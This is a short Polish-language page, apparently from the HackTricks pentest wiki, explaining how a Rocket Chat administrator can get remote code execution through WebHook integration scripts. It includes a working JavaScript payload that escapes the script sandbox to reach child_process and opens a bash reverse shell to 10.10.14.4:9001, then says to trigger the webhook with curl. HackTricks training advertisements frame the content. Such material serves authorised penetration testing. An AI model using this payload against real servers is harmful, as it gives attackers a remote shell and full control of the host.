Rocket Chat
Reading time: 2 minutes
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
RCE
Jeśli jesteś administratorem w Rocket Chat, możesz uzyskać RCE.
- Przejdź do
Integrations
i wybierzNew Integration
, a następnie wybierz dowolną:Incoming WebHook
lubOutgoing WebHook
. /admin/integrations/incoming
- Zgodnie z dokumentacją, obie używają ES2015 / ECMAScript 6 (w zasadzie JavaScript) do przetwarzania danych. Więc zdobądź rev shell dla javascript jak:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Skonfiguruj WebHook (kanał i post jako nazwa użytkownika muszą istnieć):
- Skonfiguruj skrypt WebHook:
- Zapisz zmiany
- Uzyskaj wygenerowany URL WebHook:
- Wywołaj go za pomocą curl i powinieneś otrzymać rev shell
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.